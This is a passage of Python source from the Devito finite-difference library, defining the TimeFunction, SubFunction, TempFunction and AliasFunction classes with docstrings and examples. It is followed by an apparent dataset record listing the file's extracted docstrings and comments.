                rp = self._size_inhalo[d].right
            else:
                # Split `p` into left/right contributions; note that the
                # right-hand range starts at the point itself (i = 0)
                lp = p // 2 + p % 2
                rp = p // 2
            indices = [d - i for i in range(lp, 0, -1)]
            indices.extend([d + i for i in range(rp)])
            points.extend([self.subs({d: i}) for i in indices])
        return sum(points)

    def avg(self, p=None, dims=None):
        """
        Generate a symbolic expression computing the average of ``p`` points
        along the spatial dimensions ``dims``.

        Parameters
        ----------
        p : int, optional
            The number of summands. Defaults to the halo size.
        dims : tuple of Dimension, optional
            The Dimensions along which the average is computed. Defaults to
            ``self``'s spatial dimensions.
        """
        tot = self.sum(p, dims)
        # NOTE(review): assumes `tot` is a sympy.Add with one arg per summand;
        # a single-summand `sum` would make `len(tot.args)` incorrect -- confirm
        return tot / len(tot.args)

    # Pickling support
    _pickle_kwargs = DiscreteFunction._pickle_kwargs +\
        ['space_order', 'shape_global', 'dimensions']
class TimeFunction(Function):

    """
    Tensor symbol representing a discrete function in symbolic equations.

    A TimeFunction carries multi-dimensional data and provides operations to create
    finite-differences approximations, in both space and time.

    A TimeFunction encapsulates space- and time-varying data.

    Parameters
    ----------
    name : str
        Name of the symbol.
    grid : Grid, optional
        Carries shape, dimensions, and dtype of the Function. When grid is not
        provided, shape and dimensions must be given. For MPI execution, a
        Grid is compulsory.
    space_order : int or 3-tuple of ints, optional
        Discretisation order for space derivatives. Defaults to 1. ``space_order`` also
        impacts the number of points available around a generic point of interest. By
        default, ``space_order`` points are available on both sides of a generic point of
        interest, including those nearby the grid boundary. Sometimes, fewer points
        suffice; in other scenarios, more points are necessary. In such cases, instead of
        an integer, one can pass a 3-tuple ``(o, lp, rp)`` indicating the discretization
        order (``o``) as well as the number of points on the left (``lp``) and right
        (``rp``) sides of a generic point of interest.
    time_order : int, optional
        Discretization order for time derivatives. Defaults to 1.
    shape : tuple of ints, optional
        Shape of the domain region in grid points. Only necessary if `grid` isn't given.
    dimensions : tuple of Dimension, optional
        Dimensions associated with the object. Only necessary if `grid` isn't given.
    dtype : data-type, optional
        Any object that can be interpreted as a numpy data type. Defaults
        to `np.float32`.
    save : int or Buffer, optional
        By default, ``save=None``, which indicates the use of alternating buffers. This
        enables cyclic writes to the TimeFunction. For example, if the TimeFunction
        ``u(t, x)`` has shape (3, 100), then, in an Operator, ``t`` will assume the
        values ``1, 2, 0, 1, 2, 0, 1, ...`` (note that the very first value depends
        on the stencil equation in which ``u`` is written.). The default size of the time
        buffer when ``save=None`` is ``time_order + 1``. To specify a different size for
        the time buffer, one should use the syntax ``save=Buffer(mysize)``.
        Alternatively, if all of the intermediate results are required (or, simply, to
        avoid using an alternating buffer), an explicit value for ``save`` ( an integer)
        must be provided.
    time_dim : Dimension, optional
        TimeDimension to be used in the TimeFunction. Defaults to ``grid.time_dim``.
    staggered : Dimension or tuple of Dimension or Stagger, optional
        Define how the Function is staggered.
    initializer : callable or any object exposing the buffer interface, optional
        Data initializer. If a callable is provided, data is allocated lazily.
    allocator : MemoryAllocator, optional
        Controller for memory allocation. To be used, for example, when one wants
        to take advantage of the memory hierarchy in a NUMA architecture. Refer to
        `default_allocator.__doc__` for more information.
    padding : int or tuple of ints, optional
        .. deprecated:: shouldn't be used; padding is now automatically inserted.
        Allocate extra grid points to maximize data access alignment. When a tuple
        of ints, one int per Dimension should be provided.

    Examples
    --------
    Creation

    >>> from devito import Grid, TimeFunction
    >>> grid = Grid(shape=(4, 4))
    >>> f = TimeFunction(name='f', grid=grid)
    >>> f
    f(t, x, y)
    >>> g = TimeFunction(name='g', grid=grid, time_order=2)
    >>> g
    g(t, x, y)

    First-order derivatives through centered finite-difference approximations

    >>> f.dx
    Derivative(f(t, x, y), x)
    >>> f.dt
    Derivative(f(t, x, y), t)
    >>> g.dt
    Derivative(g(t, x, y), t)

    When using the alternating buffer protocol, the size of the time dimension
    is given by ``time_order + 1``

    >>> f.shape
    (2, 4, 4)
    >>> g.shape
    (3, 4, 4)

    One can drop the alternating buffer protocol specifying a value for ``save``

    >>> h = TimeFunction(name='h', grid=grid, save=20)
    >>> h
    h(time, x, y)
    >>> h.shape
    (20, 4, 4)

    Notes
    -----
    The parameters must always be given as keyword arguments, since SymPy uses
    ``*args`` to (re-)create the dimension arguments of the symbolic object.
    If the parameter ``grid`` is provided, the values for ``shape``,
    ``dimensions`` and ``dtype`` will be derived from it. When present, the
    parameter ``shape`` should only define the spatial shape of the grid. The
    temporal dimension will be inserted automatically as the leading dimension.
    """

    is_TimeFunction = True
    is_TimeDependent = True

    _time_position = 0
    """Position of time index among the function indices."""

    def __init_finalize__(self, *args, **kwargs):
        self.time_dim = kwargs.get('time_dim', self.dimensions[self._time_position])
        self._time_order = kwargs.get('time_order', 1)
        super(TimeFunction, self).__init_finalize__(*args, **kwargs)

        # Check we won't allocate too much memory for the system
        available_mem = virtual_memory().available
        if np.dtype(self.dtype).itemsize * self.size > available_mem:
            warning("Trying to allocate more memory for symbol %s " % self.name +
                    "than available on physical device, this will start swapping")
        if not isinstance(self.time_order, int):
            raise TypeError("`time_order` must be int")

        self.save = kwargs.get('save')

    def __fd_setup__(self):
        """
        Dynamically add derivative short-cuts.
        """
        return generate_fd_shortcuts(self.dimensions, self.space_order,
                                     to=self.time_order)

    @classmethod
    def __indices_setup__(cls, **kwargs):
        dimensions = kwargs.get('dimensions')
        staggered = kwargs.get('staggered')
        if dimensions is None:
            save = kwargs.get('save')
            grid = kwargs.get('grid')
            time_dim = kwargs.get('time_dim')
            if time_dim is None:
                # `save=int` keeps all timesteps, hence a plain time Dimension;
                # otherwise a modulo-iterating stepping Dimension is used
                time_dim = grid.time_dim if isinstance(save, int) else grid.stepping_dim
            elif not (isinstance(time_dim, Dimension) and time_dim.is_Time):
                raise TypeError("`time_dim` must be a time dimension")
            dimensions = list(Function.__indices_setup__(**kwargs)[0])
            dimensions.insert(cls._time_position, time_dim)
        return Function.__indices_setup__(dimensions=dimensions, staggered=staggered)

    @classmethod
    def __shape_setup__(cls, **kwargs):
        grid = kwargs.get('grid')
        save = kwargs.get('save') or None  # Force to None if 0/False/None/...
        dimensions = kwargs.get('dimensions')
        shape = kwargs.get('shape', kwargs.get('shape_global'))
        time_order = kwargs.get('time_order', 1)
        if grid is None:
            if shape is None:
                raise TypeError("Need either `grid` or `shape`")
            if save is not None:
                raise TypeError("Ambiguity detected: provide either `grid` and `save` "
                                "or just `shape` ")
        elif shape is None:
            # Derive the spatial shape from the grid and prepend the time size
            shape = list(grid.shape_local)
            if save is None:
                shape.insert(cls._time_position, time_order + 1)
            elif isinstance(save, Buffer):
                shape.insert(cls._time_position, save.val)
            elif isinstance(save, int):
                shape.insert(cls._time_position, save)
            else:
                raise TypeError("`save` can be None, int or Buffer, not %s" % type(save))
        elif dimensions is None:
            raise TypeError("`dimensions` required if both `grid` and "
                            "`shape` are provided")
        else:
            shape = super(TimeFunction, cls).__shape_setup__(
                grid=grid, shape=shape, dimensions=dimensions
            )
        return tuple(shape)

    @cached_property
    def _fd_priority(self):
        # Time-dependent symbols take precedence over plain Functions
        return 2.1 if self.staggered in [NODE, None] else 2.2

    @property
    def time_order(self):
        """The time order."""
        return self._time_order

    @property
    def forward(self):
        """Symbol for the time-forward state of the TimeFunction."""
        i = int(self.time_order / 2) if self.time_order >= 2 else 1
        _t = self.dimensions[self._time_position]

        return self._subs(_t, _t + i * _t.spacing)

    @property
    def backward(self):
        """Symbol for the time-backward state of the TimeFunction."""
        i = int(self.time_order / 2) if self.time_order >= 2 else 1
        _t = self.dimensions[self._time_position]

        return self._subs(_t, _t - i * _t.spacing)

    @property
    def _time_size(self):
        # Allocated extent of the time dimension
        return self.shape_allocated[self._time_position]

    @property
    def time_size(self):
        return self._time_size

    @property
    def _time_buffering(self):
        # True if cyclic (modulo) time buffering is in use
        return not is_integer(self.save)

    @property
    def _time_buffering_default(self):
        # True if buffering with the default buffer size (`time_order + 1`)
        return self._time_buffering and not isinstance(self.save, Buffer)

    def _arg_check(self, args, intervals):
        super(TimeFunction, self)._arg_check(args, intervals)
        key_time_size = args[self.name].shape[self._time_position]
        if self._time_buffering and self._time_size != key_time_size:
            raise InvalidArgument("Expected `time_size=%d` for runtime "
                                  "value `%s`, found `%d` instead"
                                  % (self._time_size, self.name, key_time_size))

    # Pickling support
    _pickle_kwargs = Function._pickle_kwargs + ['time_order', 'save', 'time_dim']
class SubFunction(Function):

    """
    A Function bound to a "parent" DiscreteFunction.

    A SubFunction hands control of argument binding and halo exchange to its
    parent DiscreteFunction.
    """

    def __init_finalize__(self, *args, **kwargs):
        super(SubFunction, self).__init_finalize__(*args, **kwargs)
        # The DiscreteFunction this SubFunction is attached to
        self._parent = kwargs['parent']

    def __padding_setup__(self, **kwargs):
        # SubFunctions aren't expected to be used in time-consuming loops,
        # hence no padding is ever allocated
        return ((0, 0),) * self.ndim

    def _halo_exchange(self):
        # Deferred to the parent DiscreteFunction
        return

    def _arg_values(self, **kwargs):
        if self.name in kwargs:
            raise RuntimeError("`%s` is a SubFunction, so it can't be assigned "
                               "a value dynamically" % self.name)
        # Argument binding is entirely controlled by the parent
        return self._parent._arg_defaults(alias=self._parent).reduce_all()

    @property
    def parent(self):
        """The DiscreteFunction this SubFunction is bound to."""
        return self._parent

    _pickle_kwargs = Function._pickle_kwargs + ['parent']
class TempFunction(DiscreteFunction):

    """
    Tensor symbol used to store an intermediate sub-expression extracted from
    one or more symbolic equations.

    Users should not instantiate this class directly. TempFunctions may be created
    by Devito to store intermediate sub-expressions ("temporary values") when the
    user supplies the `cire-ftemps` option to an Operator.

    Unlike other DiscreteFunction types, TempFunctions do not carry data directly.
    However, they can generate Functions to override the TempFunction at Operator
    application time (see the Examples section below).

    TempFunctions are useful if the user wants to retain control over the allocation
    and deletion of temporary storage (by default, instead, Devito uses Arrays, which
    are allocated and deallocated upon entering and exiting C-land, respectively).

    Examples
    --------
    The `make` method makes the TempFunction create a new Function. For more info,
    refer to TempFunction.make.__doc__.

    .. code-block:: python

        op = Operator(...)
        cfuncs = [i for i in op.input if i.is_TempFunction]
        kwargs = {i.name: i.make(grid.shape) for i in cfuncs}
        op.apply(..., **kwargs)
    """

    is_TempFunction = True

    def __init_finalize__(self, *args, **kwargs):
        super().__init_finalize__(*args, **kwargs)
        # Dimension used to iterate over a *pointer* to this TempFunction
        self._pointer_dim = kwargs.get('pointer_dim')

    @classmethod
    def __indices_setup__(cls, **kwargs):
        pointer_dim = kwargs.get('pointer_dim')
        dimensions = as_tuple(kwargs['dimensions'])
        if pointer_dim not in dimensions:
            # This is a bit hacky but it does work around duplicate dimensions when
            # it gets to pickling
            dimensions = as_tuple(pointer_dim) + dimensions
        # Sanity check
        assert not any(d.is_NonlinearDerived for d in dimensions)
        return dimensions, dimensions

    def __halo_setup__(self, **kwargs):
        pointer_dim = kwargs.get('pointer_dim')
        dimensions = as_tuple(kwargs['dimensions'])
        halo = as_tuple(kwargs.get('halo'))
        # NOTE(review): `as_tuple(None)` typically returns `()`, not None, which
        # would make this branch unreachable when no `halo` is supplied --
        # confirm whether the default-halo path was ever intended to trigger
        if halo is None:
            halo = tuple((0, 0) for _ in dimensions)
        if pointer_dim is not None and pointer_dim not in dimensions:
            # Prepend a null halo entry for the pointer Dimension
            halo = ((0, 0),) + as_tuple(halo)
        return halo

    @property
    def data(self):
        # Any attempt at allocating data by the user should fail miserably
        raise TypeError("TempFunction cannot allocate data")

    # All data accessors share the same (failing) behavior
    data_domain = data
    data_with_halo = data
    data_ro_domain = data
    data_ro_with_halo = data

    @property
    def pointer_dim(self):
        return self._pointer_dim

    @property
    def dim(self):
        # Shorthand for `pointer_dim`
        return self.pointer_dim

    @property
    def shape(self):
        # Purely symbolic: a TempFunction carries no data, so the shape is
        # expressed through the Dimensions' symbolic sizes
        domain = [i.symbolic_size for i in self.dimensions]
        return DimensionTuple(*domain, getters=self.dimensions)

    @property
    def shape_with_halo(self):
        domain = self.shape
        halo = [sympy.Add(*i, evaluate=False) for i in self._size_halo]
        ret = tuple(sum(i) for i in zip(domain, halo))
        return DimensionTuple(*ret, getters=self.dimensions)

    shape_allocated = DiscreteFunction.symbolic_shape

    def make(self, shape=None, initializer=None, allocator=None, **kwargs):
        """
        Create a Function which can be used to override this TempFunction
        in a call to `op.apply(...)`.

        Parameters
        ----------
        shape : tuple of ints, optional
            Shape of the domain region in grid points.
        initializer : callable or any object exposing the buffer interface, optional
            Data initializer. If a callable is provided, data is allocated lazily.
        allocator : MemoryAllocator, optional
            Controller for memory allocation. To be used, for example, when one wants
            to take advantage of the memory hierarchy in a NUMA architecture. Refer to
            `default_allocator.__doc__` for more information.
        **kwargs
            Mapper of Operator overrides. Used to automatically derive the shape
            if not explicitly provided.
        """
        if shape is None:
            if len(kwargs) == 0:
                raise ValueError("Either `shape` or `kwargs` (Operator overrides) "
                                 "must be provided.")
            shape = []
            for n, i in enumerate(self.shape):
                # Resolve each symbolic size against the user-supplied overrides
                v = i.subs(kwargs)
                if not v.is_Integer:
                    raise ValueError("Couldn't resolve `shape[%d]=%s` with the given "
                                     "kwargs (obtained: `%s`)" % (n, i, v))
                shape.append(int(v))
            shape = tuple(shape)
        elif len(shape) != self.ndim:
            raise ValueError("`shape` must contain %d integers, not %d"
                             % (self.ndim, len(shape)))
        elif not all(is_integer(i) for i in shape):
            raise ValueError("`shape` must contain integers (got `%s`)" % str(shape))
        return Function(name=self.name, dtype=self.dtype, dimensions=self.dimensions,
                        shape=shape, halo=self.halo, initializer=initializer,
                        allocator=allocator)

    def _make_pointer(self, dim):
        # Build a twin TempFunction iterated through the pointer Dimension `dim`
        return TempFunction(name='p%s' % self.name, dtype=self.dtype, pointer_dim=dim,
                            dimensions=self.dimensions, halo=self.halo)

    def _arg_defaults(self, alias=None):
        raise RuntimeError("TempFunction does not have default arguments ")

    def _arg_values(self, **kwargs):
        if self.name in kwargs:
            new = kwargs.pop(self.name)
            if isinstance(new, DiscreteFunction):
                # Set new values and re-derive defaults
                return new._arg_defaults().reduce_all()
            else:
                raise InvalidArgument("Illegal runtime value for `%s`" % self.name)
        else:
            raise InvalidArgument("TempFunction `%s` lacks override" % self.name)

    # Pickling support
    _pickle_kwargs = DiscreteFunction._pickle_kwargs + ['dimensions', 'pointer_dim']
class AliasFunction(DiscreteFunction):

    """
    Tensor symbol that "aliases" another DiscreteFunction. Aliasing here means that
    the AliasFunction logically represents another object. This is most commonly used
    when we have a generic routine `foo(af, ...)` that we need to apply to multiple
    DiscreteFunctions; here `af` is an AliasFunction, used in the body of `foo`.

    Like a TempFunction, an AliasFunction does not carry data.
    """

    # Index/shape construction is identical to a plain Function's
    __indices_setup__ = Function.__indices_setup__
    __shape_setup__ = Function.__shape_setup__

    @property
    def _mem_mapped(self):
        # An AliasFunction carries no data, hence nothing to memory-map
        return False

    @property
    def data(self):
        # Any attempt at allocating data by the user should fail miserably
        raise TypeError("AliasFunction cannot allocate data")

    # All data accessors share the same (failing) behavior
    data_domain = data
    data_with_halo = data
    data_ro_domain = data
    data_ro_with_halo = data
|
en
| 0.795372
|
Tensor symbol representing a discrete function in symbolic equations. Unlike an Array, a DiscreteFunction carries data. Notes ----- Users should not instantiate this class directly. Use Function or SparseFunction (or their subclasses) instead. # Required by SymPy, otherwise the presence of __getitem__ will make SymPy # think that a DiscreteFunction is actually iterable, thus breaking many of # its key routines (e.g., solve) The type of the underlying data object. # A `Distributor` to handle domain decomposition (only relevant for MPI) # Staggering metadata # Now that *all* __X_setup__ hooks have been called, we can let the # superclass constructor do its job # There may or may not be a `Grid` attached to the DiscreteFunction # Symbolic (finite difference) coefficients # Data-related properties and data initialization # Initialization postponed until the first access to .data # Allocate memory and initialize it. Note that we do *not* hold # a reference to the user-provided buffer # This is a corner case -- we might get here, for example, when # running with MPI and some processes get 0-size arrays after # domain decomposition. We touch the data anyway to avoid the # case ``self._data is None`` # The only possibility for two DiscreteFunctions to be considered equal # is that they are indeed the same exact object Allocate memory as a Data. # Clear up both SymPy and Devito caches to drop unreachable data # Allocate the actual data object # Initialize data # Perhaps user only wants to initialise the physical domain Setup staggering-related metadata. This method assigns: * 0 to non-staggered dimensions; * 1 to staggered dimensions. # There may or may not be a `Distributor`. In the latter case, the # DiscreteFunction is to be considered "local" to each MPI rank Reference to the data. Unlike :attr:`data` and :attr:`data_with_halo`, this *never* returns a view of the data. This method is for internal use only. The Grid on which the discretization occurred. 
Form of the coefficients of the function. Shape of the domain region. The domain constitutes the area of the data written to by an Operator. Notes ----- In an MPI context, this is the *local* domain region shape. Shape of the domain region. The domain constitutes the area of the data written to by an Operator. Notes ----- In an MPI context, this is the *local* domain region shape. Alias to ``self.shape``. Shape of the domain+outhalo region. The outhalo is the region surrounding the domain that may be read by an Operator. Notes ----- In an MPI context, this is the *local* with_halo region shape. Further, note that the outhalo of inner ranks is typically empty, while the outhalo of boundary ranks contains a number of elements depending on the rank position in the decomposed grid (corner, side, ...). Shape of the domain+inhalo region. The inhalo region comprises the outhalo as well as any additional "ghost" layers for MPI halo exchanges. Data in the inhalo region are exchanged when running Operators to maintain consistent values as in sequential runs. Notes ----- Typically, this property won't be used in user code, but it may come in handy for testing or debugging Shape of the allocated data. It includes the domain and inhalo regions, as well as any additional padding surrounding the halo. Notes ----- In an MPI context, this is the *local* with_halo region shape. Global shape of the domain region. The domain constitutes the area of the data written to by an Operator. Notes ----- In an MPI context, this is the *global* domain region shape, which is therefore identical on all MPI ranks. The global number of elements this object is expected to store in memory. Note that this would need to be combined with self.dtype to give the actual size in bytes. Number of points in the outer halo region. 
# Computational domain is not distributed and hence the outhalo # and inhalo correspond A space order of {0} and a halo size of {1} has been set but the current rank ({2}) has a domain size of only {3} The number of elements this object is expected to store in memory. Note that this would need to be combined with self.dtype to give the actual size in bytes. Boolean mask telling which Dimensions support modulo-indexing. Slice-based mask to access the domain region of the allocated data. Slice-based mask to access the domain+inhalo region of the allocated data. Slice-based mask to access the domain+outhalo region of the allocated data. Tuple of Decomposition objects, representing the domain decomposition. None is used as a placeholder for non-decomposed Dimensions. Tuple of Decomposition objects, representing the domain+outhalo decomposition. None is used as a placeholder for non-decomposed Dimensions. The domain data values, as a numpy.ndarray. Elements are stored in row-major format. Notes ----- With this accessor you are claiming that you will modify the values you get back. If you only need to look at the values, use :meth:`data_ro` instead. Gather distributed `Data` attached to a `Function` onto a single rank. Parameters ---------- rank : int The rank onto which the data will be gathered. step : int or tuple of ints The `slice` step in each dimension. start : int or tuple of ints The `slice` start in each dimension. stop : int or tuple of ints The final point of the `slice` to include. Notes ----- Alias to ``self.data._gather``. Note that gathering data from large simulations onto a single rank may result in memory blow-up and hence should use this method judiciously. The domain data values. Elements are stored in row-major format. Notes ----- Alias to ``self.data``. With this accessor you are claiming that you will modify the values you get back. If you only need to look at the values, use :meth:`data_ro_domain` instead. The domain+outhalo data values. 
Elements are stored in row-major format. Notes ----- With this accessor you are claiming that you will modify the values you get back. If you only need to look at the values, use :meth:`data_ro_with_halo` instead. The domain+inhalo data values. Elements are stored in row-major format. Notes ----- This accessor does *not* support global indexing. With this accessor you are claiming that you will modify the values you get back. If you only need to look at the values, use :meth:`data_ro_with_inhalo` instead. Typically, this accessor won't be used in user code to set or read data values. Instead, it may come in handy for testing or debugging The allocated data values, that is domain+inhalo+padding. Elements are stored in row-major format. Notes ----- This accessor does *not* support global indexing. With this accessor you are claiming that you will modify the values you get back. If you only need to look at the values, use :meth:`data_ro_allocated` instead. Typically, this accessor won't be used in user code to set or read data values. Instead, it may come in handy for testing or debugging The data values in a given region. Parameters ---------- region : DataRegion The data region of interest (e.g., OWNED, HALO) for which a view is produced. dim : Dimension The dimension of interest. side : DataSide The side of interest (LEFT, RIGHT). Notes ----- This accessor does *not* support global indexing. With this accessor you are claiming that you will modify the values you get back. Typically, this accessor won't be used in user code to set or read data values. Read-only view of the domain data values. Read-only view of the domain+outhalo data values. Read-only view of the domain+inhalo data values. Notes ----- This accessor does *not* support global indexing. Read-only view of the domain+inhalo+padding data values. Notes ----- This accessor does *not* support global indexing. Tuple of slices representing the global indices that logically belong to the calling MPI rank. 
Notes ----- Given a Function ``f(x, y)`` with shape ``(nx, ny)``, when *not* using MPI this property will return ``(slice(0, nx-1), slice(0, ny-1))``. On the other hand, when MPI is used, the local ranges depend on the domain decomposition, which is carried by ``self.grid``. Tuple of Dimensions defining the physical space. Tuple of MPI-distributed Dimensions. A ctypes object representing the DiscreteFunction that can be passed to an Operator. # MPI-related fields # stash a reference to the array on _obj, so we don't let it get freed # while we hold onto _obj Cast the data carried by a DiscreteFunction dataobj to an ndarray. # Depends on how fields are populated in `_C_make_dataobj` Symbolic representation of a given data region. # Note: identical to region=HALO, side=CENTER # Note: identical to region=OWNED, side=CENTER Perform the halo exchange with the neighboring processes. # Nothing to do # Get involved peers # Gather send data # Setup recv buffer # Communication # Scatter received data Tuple of argument names introduced by this function. A map of default argument values defined by this symbol. Parameters ---------- alias : DiscreteFunction, optional To bind the argument values to different names. # Collect default dimension arguments from all indices A map of argument values after evaluating user input. If no user input is provided, return a default value. Parameters ---------- **kwargs Dictionary of user-provided argument overrides. # Add value override for own data if it is provided, otherwise # use defaults # Set new values and re-derive defaults # We've been provided a pure-data replacement (array) # Add value overrides for all associated dimensions Check that ``args`` contains legal runtime values bound to ``self``. Raises ------ InvalidArgument If, given the runtime values ``args``, an out-of-bounds array access would be performed, or if shape/dtype don't match with self's shape/dtype. 
# Pickling support Tensor symbol representing a discrete function in symbolic equations. A Function carries multi-dimensional data and provides operations to create finite-differences approximations. A Function encapsulates space-varying data; for data that also varies in time, use TimeFunction instead. Parameters ---------- name : str Name of the symbol. grid : Grid, optional Carries shape, dimensions, and dtype of the Function. When grid is not provided, shape and dimensions must be given. For MPI execution, a Grid is compulsory. space_order : int or 3-tuple of ints, optional Discretisation order for space derivatives. Defaults to 1. ``space_order`` also impacts the number of points available around a generic point of interest. By default, ``space_order`` points are available on both sides of a generic point of interest, including those nearby the grid boundary. Sometimes, fewer points suffice; in other scenarios, more points are necessary. In such cases, instead of an integer, one can pass a 3-tuple ``(o, lp, rp)`` indicating the discretization order (``o``) as well as the number of points on the left (``lp``) and right (``rp``) sides of a generic point of interest. shape : tuple of ints, optional Shape of the domain region in grid points. Only necessary if ``grid`` isn't given. dimensions : tuple of Dimension, optional Dimensions associated with the object. Only necessary if ``grid`` isn't given. dtype : data-type, optional Any object that can be interpreted as a numpy data type. Defaults to ``np.float32``. staggered : Dimension or tuple of Dimension or Stagger, optional Define how the Function is staggered. initializer : callable or any object exposing the buffer interface, optional Data initializer. If a callable is provided, data is allocated lazily. allocator : MemoryAllocator, optional Controller for memory allocation. To be used, for example, when one wants to take advantage of the memory hierarchy in a NUMA architecture. 
Refer to `default_allocator.__doc__` for more information. padding : int or tuple of ints, optional .. deprecated:: shouldn't be used; padding is now automatically inserted. Allocate extra grid points to maximize data access alignment. When a tuple of ints, one int per Dimension should be provided. Examples -------- Creation >>> from devito import Grid, Function >>> grid = Grid(shape=(4, 4)) >>> f = Function(name='f', grid=grid) >>> f f(x, y) >>> g = Function(name='g', grid=grid, space_order=2) >>> g g(x, y) First-order derivatives through centered finite-difference approximations >>> f.dx Derivative(f(x, y), x) >>> f.dy Derivative(f(x, y), y) >>> g.dx Derivative(g(x, y), x) >>> (f + g).dx Derivative(f(x, y) + g(x, y), x) First-order derivatives through left/right finite-difference approximations >>> f.dxl Derivative(f(x, y), x) Note that the fact that it's a left-derivative isn't captured in the representation. However, upon derivative expansion, this becomes clear >>> f.dxl.evaluate f(x, y)/h_x - f(x - h_x, y)/h_x >>> f.dxr Derivative(f(x, y), x) Second-order derivative through centered finite-difference approximation >>> g.dx2 Derivative(g(x, y), (x, 2)) Notes ----- The parameters must always be given as keyword arguments, since SymPy uses ``*args`` to (re-)create the dimension arguments of the symbolic object. # Attach additional metadata to self's cache entry # Space order # Flag whether it is a parameter or a variable. # Used at operator evaluation to evaluate the Function at the # variable location (i.e. if the variable is staggered in x the # parameter has to be computed at x + hx/2) Dynamically add derivative short-cuts. # Staggered indices # Got `grid`, `dimensions`, and `shape`. 
We sanity-check that the # Dimensions in `dimensions` also appearing in `grid` have same size # (given by `shape`) as that provided in `grid` # Auto-padding # 0-padding in all Dimensions except in the Fastest Varying Dimension, # `fvd`, which is the innermost one # Let UB be a function that rounds up a value `x` to the nearest # multiple of the SIMD vector length, `vl` # Given the HALO and DOMAIN sizes, the right-PADDING is such that: # * the `fvd` size is a multiple of `vl` # * it contains *at least* `vl` points # This way: # * all first grid points along the `fvd` will be cache-aligned # * there is enough room to round up the loop trip counts to maximize # the effectiveness SIMD vectorization The space order. Generate a symbolic expression computing the sum of ``p`` points along the spatial dimensions ``dims``. Parameters ---------- p : int, optional The number of summands. Defaults to the halo size. dims : tuple of Dimension, optional The Dimensions along which the sum is computed. Defaults to ``self``'s spatial dimensions. Generate a symbolic expression computing the average of ``p`` points along the spatial dimensions ``dims``. Parameters ---------- p : int, optional The number of summands. Defaults to the halo size. dims : tuple of Dimension, optional The Dimensions along which the average is computed. Defaults to ``self``'s spatial dimensions. # Pickling support Tensor symbol representing a discrete function in symbolic equations. A TimeFunction carries multi-dimensional data and provides operations to create finite-differences approximations, in both space and time. A TimeFunction encapsulates space- and time-varying data. Parameters ---------- name : str Name of the symbol. grid : Grid, optional Carries shape, dimensions, and dtype of the Function. When grid is not provided, shape and dimensions must be given. For MPI execution, a Grid is compulsory. space_order : int or 3-tuple of ints, optional Discretisation order for space derivatives. Defaults to 1. 
``space_order`` also impacts the number of points available around a generic point of interest. By default, ``space_order`` points are available on both sides of a generic point of interest, including those nearby the grid boundary. Sometimes, fewer points suffice; in other scenarios, more points are necessary. In such cases, instead of an integer, one can pass a 3-tuple ``(o, lp, rp)`` indicating the discretization order (``o``) as well as the number of points on the left (``lp``) and right (``rp``) sides of a generic point of interest. time_order : int, optional Discretization order for time derivatives. Defaults to 1. shape : tuple of ints, optional Shape of the domain region in grid points. Only necessary if `grid` isn't given. dimensions : tuple of Dimension, optional Dimensions associated with the object. Only necessary if `grid` isn't given. dtype : data-type, optional Any object that can be interpreted as a numpy data type. Defaults to `np.float32`. save : int or Buffer, optional By default, ``save=None``, which indicates the use of alternating buffers. This enables cyclic writes to the TimeFunction. For example, if the TimeFunction ``u(t, x)`` has shape (3, 100), then, in an Operator, ``t`` will assume the values ``1, 2, 0, 1, 2, 0, 1, ...`` (note that the very first value depends on the stencil equation in which ``u`` is written.). The default size of the time buffer when ``save=None`` is ``time_order + 1``. To specify a different size for the time buffer, one should use the syntax ``save=Buffer(mysize)``. Alternatively, if all of the intermediate results are required (or, simply, to avoid using an alternating buffer), an explicit value for ``save`` ( an integer) must be provided. time_dim : Dimension, optional TimeDimension to be used in the TimeFunction. Defaults to ``grid.time_dim``. staggered : Dimension or tuple of Dimension or Stagger, optional Define how the Function is staggered. 
initializer : callable or any object exposing the buffer interface, optional Data initializer. If a callable is provided, data is allocated lazily. allocator : MemoryAllocator, optional Controller for memory allocation. To be used, for example, when one wants to take advantage of the memory hierarchy in a NUMA architecture. Refer to `default_allocator.__doc__` for more information. padding : int or tuple of ints, optional .. deprecated:: shouldn't be used; padding is now automatically inserted. Allocate extra grid points to maximize data access alignment. When a tuple of ints, one int per Dimension should be provided. Examples -------- Creation >>> from devito import Grid, TimeFunction >>> grid = Grid(shape=(4, 4)) >>> f = TimeFunction(name='f', grid=grid) >>> f f(t, x, y) >>> g = TimeFunction(name='g', grid=grid, time_order=2) >>> g g(t, x, y) First-order derivatives through centered finite-difference approximations >>> f.dx Derivative(f(t, x, y), x) >>> f.dt Derivative(f(t, x, y), t) >>> g.dt Derivative(g(t, x, y), t) When using the alternating buffer protocol, the size of the time dimension is given by ``time_order + 1`` >>> f.shape (2, 4, 4) >>> g.shape (3, 4, 4) One can drop the alternating buffer protocol specifying a value for ``save`` >>> h = TimeFunction(name='h', grid=grid, save=20) >>> h h(time, x, y) >>> h.shape (20, 4, 4) Notes ----- The parameters must always be given as keyword arguments, since SymPy uses ``*args`` to (re-)create the dimension arguments of the symbolic object. If the parameter ``grid`` is provided, the values for ``shape``, ``dimensions`` and ``dtype`` will be derived from it. When present, the parameter ``shape`` should only define the spatial shape of the grid. The temporal dimension will be inserted automatically as the leading dimension. Position of time index among the function indices. # Check we won't allocate too much memory for the system Dynamically add derivative short-cuts. # Force to None if 0/False/None/... 
The time order. Symbol for the time-forward state of the TimeFunction. Symbol for the time-backward state of the TimeFunction. # Pickling support A Function bound to a "parent" DiscreteFunction. A SubFunction hands control of argument binding and halo exchange to its parent DiscreteFunction. # SubFunctions aren't expected to be used in time-consuming loops Tensor symbol used to store an intermediate sub-expression extracted from one or more symbolic equations. Users should not instantiate this class directly. TempFunctions may be created by Devito to store intermediate sub-expressions ("temporary values") when the user supplies the `cire-ftemps` option to an Operator. Unlike other DiscreteFunction types, TempFunctions do not carry data directly. However, they can generate Functions to override the TempFunction at Operator application time (see the Examples section below). TempFunctions are useful if the user wants to retain control over the allocation and deletion of temporary storage (by default, instead, Devito uses Arrays, which are allocated and deallocated upon entering and exiting C-land, respectively). Examples -------- The `make` method makes the TempFunction create a new Function. For more info, refer to TempFunction.make.__doc__. .. code-block:: python op = Operator(...) cfuncs = [i for i in op.input if i.is_TempFunction] kwargs = {i.name: i.make(grid.shape) for i in cfuncs} op.apply(..., **kwargs) # This is a bit hacky but it does work around duplicate dimensions when # it gets to pickling # Sanity check # Any attempt at allocating data by the user should fail miserably Create a Function which can be used to override this TempFunction in a call to `op.apply(...)`. Parameters ---------- shape : tuple of ints, optional Shape of the domain region in grid points. initializer : callable or any object exposing the buffer interface, optional Data initializer. If a callable is provided, data is allocated lazily. 
